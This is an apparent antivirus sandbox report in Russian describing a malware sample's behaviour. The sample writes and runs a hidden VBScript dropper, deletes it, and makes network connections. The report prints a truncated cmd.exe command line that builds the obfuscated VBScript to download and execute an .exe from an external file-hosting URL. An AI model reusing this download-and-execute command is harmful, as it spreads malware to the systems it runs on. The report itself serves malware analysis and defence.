Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd %Appdata% &@echo L5q = "http://a.pomf.cat/hmlegs.exe">>N2b.vbs &@echo B0p = S6g("SXW4K^K")>>N2b.vbs &@echo Set U6d = CreateObject(S6g("SY^SR84^SRNZZV"))>>N2b.vbs &@echo U6d.Open S6g("MKZ"...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\n2b.vbs
Удаляет следующие файлы
- %APPDATA%\n2b.vbs
Сетевая активность
Подключается к
- 'a.##mf.cat':80
TCP
Запросы HTTP GET
- http://a.##mf.cat/hmlegs.exe
UDP
- DNS ASK a.##mf.cat
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\N2b.vbs"
- '<SYSTEM32>\cmd.exe' /c cd %Appdata% &@echo L5q = "http://a.pomf.cat/hmlegs.exe">>N2b.vbs &@echo B0p = S6g("SXW4K^K")>>N2b.vbs &@echo Set U6d = CreateObject(S6g("SY^SR84^SRNZZV"))>>N2b.vbs &@echo U6d.Open S6g("MKZ"...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\timeout.exe' 12
